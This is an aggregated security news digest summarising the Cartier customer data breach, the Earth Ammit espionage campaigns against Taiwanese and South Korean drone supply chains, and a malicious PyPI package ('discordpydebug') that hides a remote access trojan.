Dissent@DataBreaches.Net
//
Luxury brand Cartier has confirmed a data breach impacting its customers. The breach stemmed from a security incident affecting one of its third-party service providers. This incident has exposed sensitive customer information, including names, contact details, and dates of birth. Cartier has notified affected clients and is taking steps to address the breach and reinforce its security measures.
This incident highlights the growing concern around supply chain security and the potential vulnerabilities introduced by third-party vendors. Even prestigious brands like Cartier are susceptible to data breaches if their partners' security defenses are not robust. The breach serves as a reminder for organizations to carefully assess and manage the security risks associated with their external service providers. It's yet another reminder that supply chain security is not a theoretical risk. Even the most prestigious brands can find their reputation tarnished if a partner’s defences aren't watertight. While details remain limited, this breach comes amid a series of recent cyberattacks targeting high-end brands in both Europe and the U.S.. According to SecurityWeek, Cartier emphasized that no passwords, credit card numbers, or banking information were involved in the breach. It is not yet known if these attacks are related or the work of a single group. Cartier is owned by Richemont, and the company is working to determine the full scope of the incident and implement measures to prevent future occurrences. References :
Classification:
info@thehackernews.com (The@The Hacker News
//
A cyber espionage group known as Earth Ammit, believed to be linked to Chinese APT groups, has been actively targeting organizations in Taiwan and South Korea through coordinated multi-wave attacks. These campaigns, dubbed VENOM and TIDRONE, were conducted from 2023 to 2024 and aimed to disrupt the drone supply chain by compromising trusted networks. Victims spanned various sectors, including military, satellite, heavy industry, media, technology, software services, and healthcare, highlighting the group's broad targeting scope. The attacks demonstrate Earth Ammit's long-term goal to compromise trusted networks via supply chain attacks, allowing them to target high-value entities downstream and amplify their reach, potentially leading to data theft and exfiltration of credentials.
The VENOM campaign focused on penetrating the upstream segment of the drone supply chain. Attackers exploited web server vulnerabilities to deploy web shells and used open-source tools like REVSOCK and Sliver in an attempt to avoid attribution. The only custom malware observed in VENOM was VENFRPC, a customized version of FRPC, which is a modified version of the open-source fast reverse proxy tool. The goal was to harvest credentials and use them as a stepping stone for the TIDRONE campaign, which targeted downstream customers. The TIDRONE campaign involved multiple stages, mirroring the VENOM campaign by targeting service providers to inject malicious code and distribute malware to downstream customers. Custom-built tools like CXCLNT and CLNTEND backdoors were used for cyber espionage purposes. Post-exploitation activities included establishing persistence, escalating privileges, disabling antivirus software, and installing screenshot capturing tools. Trend Micro researchers have provided detections and blocking mechanisms via Trend Vision One™ and offer hunting queries and threat intelligence reports to help organizations defend against Earth Ammit's tactics. References :
Classification:
@socket.dev
//
A malicious Python package named 'discordpydebug' has been discovered on the Python Package Index (PyPI) repository, posing a significant threat to Discord developers. The package, disguised as a simple utility for debugging Discord bots, actually contains a remote access trojan (RAT). This RAT allows attackers to execute commands and exfiltrate data from infected systems via a covert command-and-control (C2) channel. The 'discordpydebug' package was uploaded on March 21, 2022, and has since been downloaded over 11,000 times, putting numerous developer systems at risk.
The 'discordpydebug' package targets developers who build or maintain Discord bots. The attackers took advantage of the fact that PyPI doesn't enforce strict security audits, misleading developers with a legitimate-sounding name and copying code from popular projects to appear trustworthy. The package establishes communication with an attacker-controlled server at "backstabprotection.jamesx123.repl[.]co", and includes features to read and write arbitrary files based on commands received from the server, along with the ability to run shell commands. The simplicity of the RAT is what makes it effective. The package avoids inbound connections, instead opting for outbound HTTP polling to bypass firewalls and security monitoring tools, especially in less controlled development environments. This discovery highlights the increasing danger of software supply chain attacks and the importance of vigilance when installing packages from open-source repositories. The Socket Research Team urges developers to be cautious and scrutinize any third-party tools or code snippets shared within the Discord developer community. References :
Classification:
|